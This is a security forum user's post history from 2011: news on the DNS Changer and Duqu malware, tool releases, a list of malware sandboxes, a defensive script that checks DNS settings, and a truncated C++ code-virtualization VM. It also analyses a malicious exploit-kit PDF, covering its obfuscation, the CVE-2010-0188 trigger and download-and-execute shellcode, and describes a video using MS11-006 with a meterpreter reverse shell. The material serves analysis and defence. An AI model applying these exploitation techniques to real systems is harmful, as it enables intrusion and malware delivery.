Everything posted by Nytro

  1. PHP Vulnerability Hunter 1.1.4.6
     Authored by AutoSec Tools | Site autosectools.com
     PHP Vulnerability Hunter is a PHP fuzzing tool that scans for several different vulnerabilities by performing dynamic program analysis. It can detect arbitrary command execution, local file inclusion, arbitrary upload, and several other types of vulnerabilities.
     Changes: Added code coverage report. Updated GUI validation. Several instrumentation fixes. Fixed lingering connection issue. Fixed GUI and report viewer crashes related to working directory.
     Download: http://packetstormsecurity.org/files/download/107074/phpvh1.1.4.6.zip
  2. World's stealthiest rootkit pushes DNS hijacking trojan
     DNS Changer dropped by TDSS
     By Dan Goodin
     Posted in Malware, 14th November 2011 21:49 GMT
     One of the world's most advanced pieces of malware is being used to spread DNS Changer, a trojan at the heart of a massive click fraud scheme that has already hijacked 4 million PCs, security researchers said.
     Just a few days after federal prosecutors in the US shuttered the international conspiracy, researchers from Dell SecureWorks said they discovered DNS Changer is being spread by TDSS. The rootkit, as previously reported, is among the hardest to detect and remove and is often used as a means to install keyloggers, tools for attacking websites, and other malware.
     Once installed, DNS Changer is able to alter the DNS, or domain name system, settings that computers and routers use to find the IP numbers that correspond to domain names such as theregister.co.uk and google.com. By replacing legitimate DNS servers with servers under the control of the attackers, they are able to send victims to fraudulent websites instead of the destinations the victims intended to visit.
     Last week, seven people from Estonia and Russia were criminally charged in a scam that for more than five years used DNS Changer to generate more than $14 million in profit. They racked up the windfall by redirecting victims to imposter websites that paid advertising fees to the attackers each time they were clicked on. The scheme preyed on users of computers running Microsoft Windows and Apple OS X operating systems. DNS Changer is also able to change DNS configuration settings in certain routers, particularly when they use default usernames and passwords.
     The ability of TDSS to evade antivirus protection and other security software is well documented. The rootkit, which is also known as TDL4 and Aleureon, is among the world's most advanced, with the ability to infect 64-bit versions of Windows, infect a computer's master boot record, and communicate over the Kad peer-to-peer network. Its newest payload means that victims now have an easy way to tell if they are infected.
     "The real danger of a DNS Changer infection is that it is an indicator that your system is infected with a larger malware cocktail with malware such as Rogue AV, Zeus Banking Trojan, Spam Bot, etc." an emailed report from Dell SecureWorks stated. "Controlling DNS literally gives an attacker complete access to a system."
     End users who want to know if their systems are infected should check the DNS server settings of their operating system and routers. Compromised systems will show server IP addresses within the following ranges:
     - 85.255.112.0 through 85.255.127.255
     - 67.210.0.0 through 67.210.15.255
     - 93.188.160.0 through 93.188.167.255
     - 77.67.83.0 through 77.67.83.255
     - 213.109.64.0 through 213.109.79.255
     - 64.28.176.0 through 64.28.191.255
     To check DNS settings on Windows open a command prompt and type "ipconfig /all" and then check the DNS Server field. On a Mac, choose System Preferences and then select Network. Then click on the Advanced button of the active connection. Users may also want to check the DNS servers used by their router.
     FBI officials said 4 million PCs were infected by the DNS Changer used in the operation that was shut down last week. The Dell SecureWorks report said researchers aren't sure if that number is accurate. Researchers monitoring the command and control servers used in the attack are seeing about 600,000 unique IP addresses connect per day.
     Source: World's stealthiest rootkit pushes DNS hijacking trojan - The Register
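A script that performs the check the article describes: it pulls the resolvers out of "ipconfig /all" output and flags any that fall inside the six ranges listed above. This is an added example, not code from the article or from Dell SecureWorks; the ipconfig sample is constructed and the English "DNS Servers" field label is assumed.

```python
"""Flag DNS servers that fall inside the DNS Changer ranges from the article.

Added example, not code from the article or from Dell SecureWorks. The six
ranges are the ones the article lists; the ipconfig /all output below is a
constructed sample, and the English "DNS Servers" field label is assumed.
"""
import ipaddress
import re

# The six address ranges named in the article, as (first, last) pairs.
DNS_CHANGER_RANGES = [
    ("85.255.112.0", "85.255.127.255"),
    ("67.210.0.0", "67.210.15.255"),
    ("93.188.160.0", "93.188.167.255"),
    ("77.67.83.0", "77.67.83.255"),
    ("213.109.64.0", "213.109.79.255"),
    ("64.28.176.0", "64.28.191.255"),
]

# Parsed once so each lookup is two comparisons per range.
_RANGES = [
    (ipaddress.IPv4Address(lo), ipaddress.IPv4Address(hi))
    for lo, hi in DNS_CHANGER_RANGES
]


def is_dns_changer_address(server: str) -> bool:
    """True if server is an IPv4 address inside one of the rogue ranges.

    Anything that is not a plain IPv4 address (an IPv6 resolver, a zone
    suffix such as fec0::1%1, stray text) is reported as not matching.
    """
    try:
        addr = ipaddress.IPv4Address(server)
    except ValueError:
        return False
    return any(lo <= addr <= hi for lo, hi in _RANGES)


# "DNS Servers . . . . . . . . . . . : 1.2.3.4" opens the resolver block.
_DNS_FIELD = re.compile(r"^\s*DNS Servers[ .]*:\s*(\S+)\s*$")
# Additional resolvers follow on lines holding a single indented token;
# every other ipconfig field line contains spaces and a ": " separator.
_CONTINUATION = re.compile(r"^\s+(\S+)\s*$")


def extract_dns_servers(ipconfig_output: str) -> list:
    """Return every resolver listed under 'DNS Servers' in ipconfig /all output."""
    servers = []
    in_block = False
    for line in ipconfig_output.splitlines():
        field = _DNS_FIELD.match(line)
        if field:
            servers.append(field.group(1))
            in_block = True
            continue
        if in_block:
            cont = _CONTINUATION.match(line)
            if cont:
                servers.append(cont.group(1))
                continue
            in_block = False  # the next field or a blank line ends the block
    return servers


def flagged_servers(ipconfig_output: str) -> list:
    """Resolvers from the output that sit inside a DNS Changer range."""
    return [s for s in extract_dns_servers(ipconfig_output)
            if is_dns_changer_address(s)]


# Constructed sample of ipconfig /all output: one rogue resolver, one IPv6
# resolver and one local resolver, in the layout Windows prints.
SAMPLE_IPCONFIG = """\
Windows IP Configuration

   Host Name . . . . . . . . . . . . : WORKSTATION-01

Ethernet adapter Local Area Connection:

   IPv4 Address. . . . . . . . . . . : 192.168.1.10(Preferred)
   Default Gateway . . . . . . . . . : 192.168.1.1
   DNS Servers . . . . . . . . . . . : 85.255.112.36
                                       fec0:0:0:ffff::1%1
                                       192.168.1.1
   NetBIOS over Tcpip. . . . . . . . : Enabled
"""

if __name__ == "__main__":
    for server in extract_dns_servers(SAMPLE_IPCONFIG):
        verdict = "DNS CHANGER RANGE" if is_dns_changer_address(server) else "ok"
        print(f"{server:40} {verdict}")
```

On a real machine, feed the script the saved output of "ipconfig /all" instead of the constructed sample; a non-empty result from flagged_servers is the indicator the article describes.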
  3. Introduction to Linux Kernel 2.6: How to write a Rootkit
     Maurice Leclaire, TumFUG Linux / Unix get-together, January 19, 2011
     Why hacking the kernel?
     - Understanding the Linux kernel
     - Fixing bugs
     - Adding special features
     - Writing drivers for special hardware
     - Writing rootkits
     Download: http://info.fs.tum.de/images/2/21/2011-01-19-kernel-hacking.pdf
  4. Jason Warner Interview About Ubuntu 12.04 Desktop
     Marius Nestor - Softpedia
     During the Ubuntu Development Summit for Ubuntu 12.04 LTS, Jason Warner, Ubuntu Desktop Manager at Canonical, gave an interview to Amber Graner, an Ubuntu contributor involved in the community since February 2009. In the interview, Jason Warner talks about the desktop interface in the upcoming Ubuntu 12.04 LTS (Precise Pangolin) and what users should expect from it. Jason Warner says that users will find a more tweaked and bug-free Unity interface in Ubuntu 12.04 LTS, as well as an overall quality and very stable release. In the 5-minute interview, Jason Warner was also asked about his team, user feedback and contributions, and the next Long Term Support release, Ubuntu 14.04 LTS. You can watch the entire, 5 minutes and 13 seconds long, interview with Jason Warner, Ubuntu Desktop Manager at Canonical, right here on this page, at the top. Enjoy!
     Video: http://www.youtube.com/watch?v=o1SgMKZ7T9Q&feature=player_embedded#!
     Source: Jason Warner Interview About Ubuntu 12.04 Desktop - Softpedia
  5. 7 Facts On Duqu Malware Attacks
     Research into Duqu malware finds a component compiled in 2007, but identified successful attacks that occurred as recently as April 2011.
     By Mathew J. Schwartz, InformationWeek, November 16, 2011 11:25 AM
     New information continues to emerge about the Duqu malware that was designed to steal information relating to industrial control systems. The latest analysis of the Duqu malware has found that one of the components used in the attack was compiled in 2007. But Duqu was used in a targeted attack as recently as April 2011, pointing to a possible four-year attack campaign by Duqu's authors, whose identities and affiliations remain unknown. What is known, however, is that to date, Duqu infected organizations in at least eight countries--including Iran--in part by using a still-unpatched Windows zero-day vulnerability. Furthermore, as researchers continue to study Duqu variants, these findings have emerged:
     1. Duqu was a boutique exploit. To date, researchers have discovered "12 unique sets of Duqu files," said Alexander Gostev, chief security expert at Kaspersky Lab and author of a recent Duqu report. That's significant, since "for every victim, a separate set of attack files was created," he said via email.
     2. Duqu relates to Stars. According to a Duqu timeline assembled by Kaspersky Lab, Duqu appeared at the same time as the Stars virus hit Iran. "At that time Iranian specialists didn't share samples of the discovered virus with any of the antivirus companies, and this, it has to be said, was a serious mistake, which gave rise to all subsequent events in this saga," said Gostev. "Most probably, the Iranians found a keylogger module that had been loaded onto a system and which contained a photo of the NGC 6745 galaxy. This could explain the title 'Stars' given to it."
     3. Attackers covered their tracks. Pointing to the difficulty of tracing attacks back to the actual people who launched them, Gostev said that the Duqu exploits, which used malicious .doc files attached to emails, "took place from anonymous mailboxes, probably via compromised computers." In the case of one particular attack, dubbed "variant F" by Kaspersky, attackers used a computer--again, likely compromised--in South Korea to send attack emails on April 17, 2011, followed by another attack four days later. The first attack ended up in a junk mail folder. "The second attack turned out successful: the addressee opened the attached .doc file that contained the vulnerability exploit and Trojan installer," said Gostev.
     4. Exploit used Dexter font. How did Duqu attack? For the Duqu-F variant at least, "the vulnerability exploit was contained in the font called 'Dexter Regular,'" said Gostev. But that attack code was only a dropper or installer program, which then downloaded further attack code onto the targeted PC. "After penetration into a system the attackers installed extra modules and infected neighboring computers," he said.
     5. Duqu used a ruse. Interestingly, after infecting a PC, Duqu did nothing--at least initially--except residing in memory and staying put even if the .doc file was closed. "This period of inactivity lasted around 10 minutes, after which the exploit waited for the user's activity to stop--no keyboard or mouse activity. Only then did the dropper kick into action," said Gostev.
     6. Attackers used disposable control servers. Each Duqu variant had its own, separate control server, which provides further evidence that it was a highly targeted attack. Having a disposable infrastructure, furthermore, helped ensure that the discovery of one Duqu variant or attack wouldn't give away any of the others. Unlike Shady RAT's masterminds, the Duqu attackers also appear to have left the control servers active only for as long as they were required. Indeed, for a control server used to launch the Duqu-F attack, "we think that it is not functioning now and all critical information on it has already been deleted by the attackers," said Gostev. Kaspersky likewise found an identical data-wipe after researching another Duqu variant.
     7. Duqu contained communication backups. Duqu can connect not just to command-and-control (C&C) servers, but also function as a server itself. "There are two lists of C&C servers, one can contain domain names, IP addresses, or names of network shares, and the other contains IP addresses in binary format and is used to connect using Windows HTTP (winhttp) services," according to a report published by Kaspersky Lab expert Igor Soumenkov. "Although the configuration blocks we have found so far are similar and are set up to connect to its C&C using HTTP and HTTPS, the payload .dll [file] is able to connect to a network share and even become a server." In other words, while Duqu may have only attacked a handful of organizations, it was engineered to succeed.
     Source: 7 Facts On Duqu Malware Attacks - Security - Attacks/breaches - Informationweek
  6. Duplicate Lines Remover
     Easily delete duplicate lines from files.
     Duplicate Lines Remover is a handy freeware application which allows you to easily remove duplicate lines from files and strings. You can specify to ignore empty lines, remove empty lines and enable sorting of items. It is also possible to add the application to the SendTo menu to easily remove duplicate lines from files present on the hard drive.
     Duplicate Lines Remover is compatible with the following 32-bit and 64-bit Microsoft Windows Operating Systems: Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7
     Features
     - Add to SendTo menu
     - Commandline version
     - Compatible with BOTH 32-bit and 64-bit OS
     - Ignore empty lines
     - Remove duplicate lines from files
     - Remove duplicate lines from strings
     - Remove empty lines
     - Sort lines of a file
     - Very user-friendly GUI
     Details
     Version: 1.2.0.0
     Operating System: Windows All | 32-bit and 64-bit
     Last Update: 17.11.2011
     Category: Security
     License: Freeware
     Download: http://downloads.novirusthanks.org/files/duplicate_lines_remover.exe
     Source: Duplicate Lines Remover - Easily remove duplicate lines from files and strings
  7. Vmfs Recovery
     Recover Data from Vmfs Disks
     Vmfs Recovery offers a safe, easy way to recover information stored on VMFS-formatted disks. Like any other storage media, VMware disks can get damaged by software and hardware faults. Bad blocks and physical corruption of hard drives storing the virtual disk images can also cause corruption to VMware images.
     Recover Information from Healthy and Damaged VMFS Drives
     Vmfs Recovery can recover data from healthy and corrupted virtual disk images used by VMware vSphere 5, ESX/ESXi and VMware® ESX Server in fully automated mode. As VMware employs VMFS, its very own file system, to store virtual machines, Vmfs Recovery works equally well in quick and full recovery modes.
     Recover VMDK Disks from ESX Servers
     Recovering VMDK images from ESX servers is a two-step process. First, Vmfs Recovery will repair the ESX/ESXi storage to gain access to individual virtual PCs stored in these partitions. After that, individual virtual machines represented with their VMDK disks can be extracted, and a standard data recovery process can be launched.
     Recover VMware Partitions from Damaged Hard Drives and Faulty RAID Arrays
     VMFS disks can be recovered from damaged, corrupted and inaccessible physical hard drives and RAID arrays, including corrupted RAIDs and broken arrays with or without the original RAID controller installed.
     Fully Automated VMFS Recovery
     VMFS disks can be recovered from damaged, corrupted and inaccessible physical hard drives and RAID arrays, including corrupted RAIDs and broken arrays with or without the original RAID controller installed.
     What Can Be Recovered
     - VMDK images from healthy and corrupted VMFS disks created in all versions of ESX Server or VMware
     - VMFS drives stored on working or faulty RAID arrays, with or without the original RAID controller present
     - VMFS drives stored on corrupted and inaccessible hard drives
     - VMDK images stored in disks formatted by VMware® ESX Server
     Compatibility
     - VMFS partitions created in VMware vSphere 5 and ESX/ESXi VMware® ESX Server
     - VMFS3 and VMFS5 support
     - Supports files up to 2TB
     - VMFS5 drives with more than 100,000 files
     - VMFS partitions up to 64TB
     - Unicode file names in VMFS5
     - VMFS drives stored on all types of RAID arrays including RAID JBOD, 0, 1, 1E, RAID 4, RAID 5, RAID 5R, 0+1 and 1+0
     - VMFS partitions stored on hardware and integrated RAID arrays
     - Runs in all versions of Windows 7, 2008 R1/R2, Vista/XP/2000
     Features
     - Two modes of operation: quick and full recovery
     - Fully guided, step-by-step recovery wizard
     - Saves recovered files and folders on local or remote locations
     - Supports FTP upload and can burn recovered data onto CD & DVD discs
     - Can mount virtual disks to system as drive letters (will be accessible with Explorer and all other browsers and file utilities)
     - Recovers information bypassing Windows access restrictions
     - Supports long and international file names and folders with multiple sub-folders
     - Recovers VMDK images from corrupted VMFS partitions stored on corrupted RAID arrays with or without the original RAID controller
     - Supports all the features of Raid Recovery
     Compatibility
     Diskinternals Vmfs Recovery supports VMFS partitions created in VMware vSphere 5 and ESX/ESXi drives created in VMware® ESX Server. Vmfs Recovery supports Windows 7 and 2008 Server R1/R2, as well as Windows 2000, XP, 2003 Server, and Windows Vista. All types of internal and external hard drives and RAID arrays are supported, with or without the original RAID controller.
     Free Download
     Diskinternals Vmfs Recovery is available as a free evaluation. Get your copy now.
     Download: http://www.diskinternals.com/download/Vmfs_Recovery.exe
     Source: Recover Data from VMFS, ESX, ESXi, vSphere Disks
  8. Acunetix Web Vulnerability Scanner 8 BETA Released
     The next stage in the evolution of Acunetix Web Vulnerability Scanner has arrived: WVS 8 BETA! Many of you have been biting your nails in anticipation of this Beta, so sit tight and read on for the next most important stage in the evolution of Acunetix WVS. Version 8 of Web Vulnerability Scanner has been optimized to make life easier at every stage of a security scan. WVS is easier to use for web admins and security analysts alike: enhanced automation, ability to save scan settings as a template to avoid reconfiguration, and multiple instance support for simultaneous scans of several websites. WVS 8 also ushers in a new exciting co-operation between Acunetix and Imperva: developers of the industry's leading Web Application Firewall.
     Download: http://www.acunetix.com/vulnerability-scanner/vulnerabilityscanner8.exe
     Source: http://thehackernews.com/2011/11/acunetix-web-vulnerability-scanner-8.html
  9. Using MS11-006 To Create Honeypot
     Description: This video uses a buffer overflow exploit found in the Microsoft Windows thumbnail folder view setting. It uses the MS11-006 exploit found in Metasploit and a meterpreter payload to create a reverse connection back through the victim's firewall to the attacker. Notice that the file is never opened.
     I recommend you watch it.
     http://www.securitytube.net/video/2456
     http://vimeo.com/32105952
  10. Unemployed Romanian hacker accused of breaking into NASA
  11. Nonsense. 1) It doesn't free memory, it can't; on the contrary, it tries to allocate a lot of it. 2) I think there's an extra "0". 3) Most likely it will result in an "Out of string space". Or maybe I'm wrong and it's a very complex algorithm that searches for memory leaks and acts as a general garbage collector, discovering the lack of references to allocated data...
  12. Did you do a Quick format?
  13. List of Free Sandboxes for Malware Analysis!
      by MAYURESH on NOVEMBER 15, 2011
      We had done a similar post - way back in 2009 - titled List of Online Malware Scanners. Cut to the end of 2011, we now bring you a list of free sandboxes for malware analysis. Most of them are free and open source products. However, we also have included a few commercial versions and those that can be installed on your system. First, as it always has been a tradition at PenTestIT, let us know what actually malware analysis means: Malware analysis simply means study of malicious programs via code analysis, behaviour analysis or a combination of both these techniques. But where does a sandbox fit in? It helps you in automated behaviour analysis. We like to elongate a sandbox as follows - System And Network Detection Box (as in a system). So, now that we know a bit about malware analysis with sandboxes, let's see the list of free sandboxes for malware analysis.
      - GFI ThreatTrack: GFI Sandbox (formerly CWSandbox) is an industry leading dynamic malware analysis tool. It gives you the power to analyze virtually any Windows application or file including infected: Office documents, PDFs, malicious URLs and Flash ads. Once you submit your sample below we will email you an executive level PDF and an XML report containing all the behavior information gathered during analysis. – http://www.threattrack.com/
      - CWSandbox: CWSandbox is an approach to automatically analyze malware which is based on behavior analysis: malware samples are executed for a finite time in a simulated environment, where all system calls are closely monitored. From these observations, CWSandbox is able to automatically generate a detailed report which greatly simplifies the task of a malware analyst. – http://www.mwanalysis.org/
      - ThreatExpert: ThreatExpert is an advanced automated threat analysis system designed to analyze and report the behavior of computer viruses, worms, trojans, adware, spyware, and other security-related risks in a fully automated mode. In only a few minutes ThreatExpert can process a sample and generate a highly detailed threat report with the level of technical detail that matches or exceeds antivirus industry standards such as those normally found in online virus encyclopedias. – http://www.threatexpert.com/
      - Xandora: xandora.net is a tool for analyzing the behavior of Windows PE-executables with special focus on the analysis of malware. Execution of xandora.net results in the generation of a report file that contains enough information to give a human user a very good impression about the purpose and the actions of the analyzed binary. The generated report includes detailed data about modifications made to the Windows registry or the file system or other processes and of course it logs all generated network traffic. The analysis is based on running the binary in an emulated environment and watching. It is the ideal tool for a person to get a quick understanding of the purpose of an unknown binary. – http://www.xandora.net/xangui/
      - Anubis: Anubis is a tool for analyzing the behavior of Windows PE-executables with special focus on the analysis of malware. Execution of Anubis results in the generation of a report file that contains enough information to give a human user a very good impression about the purpose and the actions of the analyzed binary. The generated report includes detailed data about modifications made to the Windows registry or the file system, about interactions with the Windows Service Manager or other processes and of course it logs all generated network traffic. The analysis is based on running the binary in an emulated environment and watching, i.e. analyzing, its execution. The analysis focuses on the security-relevant aspects of a program's actions, which makes the analysis process easier and because the domain is more fine-grained it allows for more precise results. It is the ideal tool for the malware and virus interested person to get a quick understanding of the purpose of an unknown binary. – http://anubis.iseclab.org/
      - Comodo Camas: CAMAS stands for Comodo Automated Malware Analysis System. – http://camas.comodo.com/
      - Norman SandBox – http://www.norman.com/security_center/security_tools/
      - Malbox: Malbox is a service for malware analysis. Submit your Windows executable (*.exe) or compressed (*.zip) files (name the file you want to analyse "main.exe") and you will receive an analysis report telling you what it does, or submit a suspicious URL and you will receive a report that shows you all the activities of the Internet Explorer process when visiting this URL. – http://malbox.xjtu.edu.cn/
      - DELL SecureWorks Truman: Truman can be used to build a "sandnet", a tool for analyzing malware in an environment that is isolated, yet provides a virtual Internet for the malware to interact with. It runs on native hardware, therefore it is not stymied by malware which can detect VMWare and other VMs. The major stumbling block to not using VMs is the difficulty involved with repeatedly imaging machines for re-use. Truman automates this process, leaving the researcher with only minimal work to do in order to get an initial analysis of a piece of malware. Truman consists of a Linux boot image (originally based on Chas Tomlin's Windows Image Using Linux) and a collection of scripts. Also provided is pmodump, a Perl-based tool to reconstruct the virtual memory space of a process from a PhysicalMemory dump. With this tool it is possible to circumvent most packers to perform strings analysis on the dumped malware. – http://www.secureworks.com/research/tools/truman/
      - Cuckoo Sandbox: Cuckoo provides you with a fully automated system able to fetch files, analyze them inside an isolated virtualized Windows system and return back results. We covered the Cuckoo Sandbox here – http://www.pentestit.com/cuckoo-malware-analysis-sandbox/
      - Buster Sandbox Analyzer: It is a tool that has been designed to analyze the behaviour of processes and the changes made to the system and then evaluate if they are malware suspicious. The changes made to the system can be of several types: file system changes, registry changes and port changes. We covered Buster Sandbox Analyzer here – http://www.pentestit.com/buster-sandbox-analyzer-malware-analyzer/
      - BitBlaze: The BitBlaze project aims to design and develop a powerful binary analysis platform and employ the platform in order to analyze and develop novel common off-the-shelf protection and diagnostic mechanisms and analyze, understand, and develop defenses against malicious code. The BitBlaze project also strives to open new application areas of binary analysis, which provides sound and effective solutions to applications beyond software security and malicious code defense, such as protocol reverse engineering and fingerprint generation. – http://bitblaze.cs.berkeley.edu/
      - Minibis: http://www.cert.at/downloads/software/minibis_en.html
      - Zero Wine Malware Analysis Tool: Zero Wine is a malware behavior analysis tool. Just upload your suspicious PE file (Windows executable) through the web interface and let it analyze the behaviour of the process. – http://sourceforge.net/projects/zerowine/
      - Zero Wine Tryouts: Zero Wine Tryouts is an open source malware analysis tool. Just upload your suspicious file (e.g. Windows executable file, PDF file) through the web interface and let it analyze. The Zero Wine Tryouts project is a fork of the original Zero Wine project. – http://zerowine-tryout.sourceforge.net/
      - Norman Malware Analyzer G2 (commercial): Malware Analyzer G2 is the next generation of malware analysis from the inventors of SandBox, voted "Most Innovative Idea in the Past 10 Years" by security researchers at the VB2010 Conference. Analyzer G2 Hybrid SandBoxing combines the benefits of the entirely emulated SandBox environment with IntelliVM monitoring with KernelScout to offer intelligence unmatched by any other product. – http://www.norman.com/products/sandbox_malware_analyzers/en
      - GFI SandBox (commercial): GFI SandBox (formerly CWSandbox) is an industry leading dynamic malware analysis tool. It gives you the power to analyze virtually any Windows application or file including infected: Office documents, PDFs, malicious URLs, Flash ads and custom applications. Targeted attacks, hacked websites, malicious Office documents, infected email attachments and social engineering are all part of the Internet threat landscape today. Only GFI SandBox™ gives you a complete view of every aspect and element of a threat, from infection vector to payload execution. And GFI SandBox can quickly and intelligently identify malicious behavior using Digital Behavior Traits™ technology. – http://www.gfi.com/malware-analysis-tool/
      - Joe Sandbox (commercial): Joe Sandbox (formerly JoeBox) is a fully automated analysis system for trojans, viruses and rootkits (malware). It takes malicious executables such as PE, PDF (Acrobat Reader) or DOC (Microsoft Word) files as input and returns highly detailed reports describing the behavior of the executables being executed. The well structured reports show how the malware installs itself, how it communicates with the internet and how it hides its presence. With the help of advanced behavior signatures Joe Sandbox summarizes interesting actions, making the understanding of the behavior extremely easy. Joe Sandbox is suitable for manual as well as for large scale malware analysis. – http://www.joesecurity.org/index.php
      That is all we've got as of now. I know this list is a largely un-structured list, but I built it from a text file containing only the links to these products. Again, these are arranged according to my wish. Oh yes, if you know of any more, please let us know! That is why we have opened up the comments system now!
      Source: http://www.pentestit.com/list-sandboxes-malware-analysis/
  14. Analysis of a malicious PDF from a SEO Sploit Pack
      According to a Kaspersky Lab article, SEO Sploit Pack is one of the Exploit Kits which appeared in the first months of the year, with PDF and Java vulnerabilities being the most used in this type of kit. That's the reason why I've chosen to analyse a malicious PDF file downloaded from a SEO Sploit Pack. The PDF file kissasszod.pdf was downloaded from hxxp://marinada3.com/88/eatavayinquisitive.php and it had a low detection rate. So taking a look at the file with peepdf we can see this information:
      In a quick look we can see that there is Javascript code in object 8 and that the element /AcroForm is probably used to execute something when the document is opened. The next step is to explore these objects and find out what will be executed:
      We can see that object 8 is located in the /XFA array of the /AcroForm and that the element to be referenced, as the /Field element tells, is yomRote[0].grueLox[0].khfdskjfh[0]. Now it's time to take a close look at object 8, the one containing Javascript code:
      The tags we have seen in the downward path from the /Fields element show which element will be located in the form: yomRote[0].grueLox[0].khfdskjfh[0]. The names yomRote and grueLox are subforms of the template contained in object 8. Within the subform grueLox we have a field called khfdskjfh, where the Javascript code is located. So we know that certainly this code will be executed:
      This script is trying to obfuscate the execution of the eval function (line 5), so we could substitute brtd by eval to make it clearer. In line 24 we can see that the returned value from the function oerz will be executed with eval. This function takes as arguments the content of the element khfdskjfh (ignoring the first 50 characters) and the eval function itself. But, where is the content of khfdskjfh? Object 8 defines the structure of the form but the content of that variable is not included, which should be in the downward path from a xfa:datasets element. Taking a look at all the objects of the /XFA array...
      Object 10 is the winner, the content of khfdskjfh is located there: it seems to be two arrays, one array of arrays and one array of numbers. Taking a look at the function oerz we can understand the function of these arrays. The second array is an argument of oerz and it's stored in the variable axzr, while the first array will be stored in the variable uyj. After this, some characters from the first array will be stored in yjf (those with decimal values between 32-48, 65-97, 48-64, 10-11, 13-14 and 97-126). And finally, the result of using the second array (axzr) as an array of indexes for the variable yjf will be stored in tash. There are some small modifications to do here because some parts of the original code are not executed by Spidermonkey. So after the changes, we can execute it without problems now:
      The result is a second stage of Javascript code:
      The function _X is executed in this new Javascript code, used for storing in the element khfdskjfh (line 59) a base64 value depending on the Acrobat Reader version (line 45). Decoding the content we find a TIFF image:
      This is the trigger of the vulnerability CVE-2010-0188. Just before, the shellcode is passed as parameter for the _L function, used for the heap spraying. The variable _ET (line 57) contains the escaped shellcode and we can obtain the unescaped bytes thanks to these commands:
      We can suppose that the payload will try to download some type of malware from the URL, but we cannot see any function in the unescaped bytes. This time the command sctest is not useful so another option is to obtain an executable thanks to shellcode2exe by Mario Vilas and take a look in the debugger:
      Now we can confirm the purpose of the shellcode. It tries to download an executable from the URL (URLDownloadToFileA) to store it in a system temporary directory (GetTempPathA) and finally execute it (WinExec). The URL was offline and we cannot find out what type of malware was downloaded, but looking at the activity of the domain marinada3.com we can suspect that the malware was a ZeuS 2.x.
      Submitted by jesparza on Mon, 2011/11/14 - 01:03
      Source: Analysis of a malicious PDF from a SEO Sploit Pack | eternal-todo.com
  15. Hackers attack Wi-Fi at airports and other public places with fake network
      Nov 16, 2011, 11:20 AM
      If you are using Wi-Fi at airports and other public places, your account may be at risk. The hackers set up fake Wi-Fi networks with names like "LAX Free WI-FI", enticing people with laptops, smartphones, tablets, or other devices to access the internet through their bogus network. This results in your account being compromised. Attackers can get your confidential data.
      "So if they go to their bank, it will grab all of their banking information," said Cyber security expert Gregory Evans. "If they go to their Facebook, it'll grab all that- their Twitter account. If they're writing love letters, I can grab all of that."
      Some tips to prevent Wi-Fi hacking: If you're at an airport or other place find out who the Wi-Fi provider is and use that provider even if it costs money. If you go online in a public place, someone could be watching or recording you, peeking at personal information, including bank accounts. Experts say change your passwords from time to time and use different passwords for different accounts.
      Source: Hackers attack Wi-Fi at airports and other public places with fake network ~ e Hacking News [EHN] | Hackers News
      I posted it just for the idea; I know you will do the same.
  16. Recuva File Recovery Accidentally deleted an important file? Lost something important when your computer crashed? No problem! Recuva recovers files deleted from your Windows computer, Recycle Bin, digital camera card, or MP3 player. And it's free!
v1.41.537 (10 Oct 2011)
- Added content searching for specific text in deleted files.
- Added regular expression matching to the filter.
- Added preliminary support for Windows 8.
- Improved support for BartPE (added new folder creation).
- Fixed filter drop down highlight issue.
- Improved recovery of compressed files from drives with non-standard cluster size.
- Many minor UI improvements.
- Latvian language added.
Download: http://www.piriform.com/recuva/download
  17. [C++] Simple Code Virtualization (Virtual Machine / Emulator) Original code by: abhe Ported by: steve10120 at ic0de.org Thanks to Edi for help with inst_table Original: ic0de.org

/*
 Original code by: abhe
 Ported by: steve10120@ic0de.org
 Thanks to Edi for help with inst_table

 The VM stores host pointers in DWORD fields (EIP, ESP, memory operands),
 so it only works when built as a 32-bit executable.
*/
#include <Windows.h>
#include <iostream>

int const REGISTER_EAX = 0;
int const REGISTER_ECX = 1;
int const REGISTER_EDX = 2;
int const REGISTER_EBX = 3;
int const REGISTER_ESP = 4;
int const REGISTER_EBP = 5;
int const REGISTER_ESI = 6;
int const REGISTER_EDI = 7;
int const REGISTER_NOP = 8;

typedef struct _VMCONTEXT {
    DWORD EIP;      // address of the next bytecode byte
    DWORD Reg[8];   // virtual registers; Reg[REGISTER_ESP] points into the VM stack
} VMCONTEXT, *PVMCONTEXT;

typedef void (VM_FUNCTION_CALL)(PVMCONTEXT c);

typedef struct _INST {
    VM_FUNCTION_CALL* FunctionCall;
} INST, *PINST;

// Advance the virtual instruction pointer past an operand of n bytes.
void AddCode(PVMCONTEXT c, BYTE n) { c->EIP += n; }

// Opcode 0: retn. Does nothing itself; ExecuteVM stops its dispatch loop on it.
void VRetn(PVMCONTEXT c) { }

// Opcode 1: jmp imm32. The operand is an absolute address of bytecode.
void VJmp(PVMCONTEXT c)
{
    DWORD imm32;
    c->EIP++;
    imm32 = *(PDWORD)c->EIP;
    c->EIP = imm32;
}

// The VM stack grows upward: push stores at ESP and then adds 4, so pop has to
// subtract 4 first and then load. (The original popped in the wrong order and
// read the slot above the last value pushed.)
void VPUSHImm(PVMCONTEXT c)
{
    DWORD imm32;
    c->EIP++;
    imm32 = *(PDWORD)c->EIP; AddCode(c, 4);
    *(PDWORD)c->Reg[REGISTER_ESP] = imm32;
    c->Reg[REGISTER_ESP] += 4;
}

void VPUSHReg(PVMCONTEXT c)
{
    BYTE regflag;
    c->EIP++;
    regflag = *(PBYTE)c->EIP; AddCode(c, 1);
    if ( regflag < 8 ) {
        *(PDWORD)c->Reg[REGISTER_ESP] = c->Reg[regflag];
        c->Reg[REGISTER_ESP] += 4;
    }
}

void VPUSHMem(PVMCONTEXT c)
{
    DWORD mem32, imm32;
    c->EIP++;
    mem32 = *(PDWORD)c->EIP; AddCode(c, 4);
    imm32 = *(PDWORD)mem32;
    *(PDWORD)c->Reg[REGISTER_ESP] = imm32;
    c->Reg[REGISTER_ESP] += 4;
}

void VPOPReg(PVMCONTEXT c)
{
    BYTE regflag;
    c->EIP++;
    regflag = *(PBYTE)c->EIP; AddCode(c, 1);
    if ( regflag < 8 ) {
        c->Reg[REGISTER_ESP] -= 4;
        c->Reg[regflag] = *(PDWORD)c->Reg[REGISTER_ESP];
    }
}

void VPOPMem(PVMCONTEXT c)
{
    DWORD imm32, mem32;
    c->EIP++;                                 // skip the opcode byte (missing in the original)
    mem32 = *(PDWORD)c->EIP; AddCode(c, 4);
    c->Reg[REGISTER_ESP] -= 4;
    imm32 = *(PDWORD)c->Reg[REGISTER_ESP];
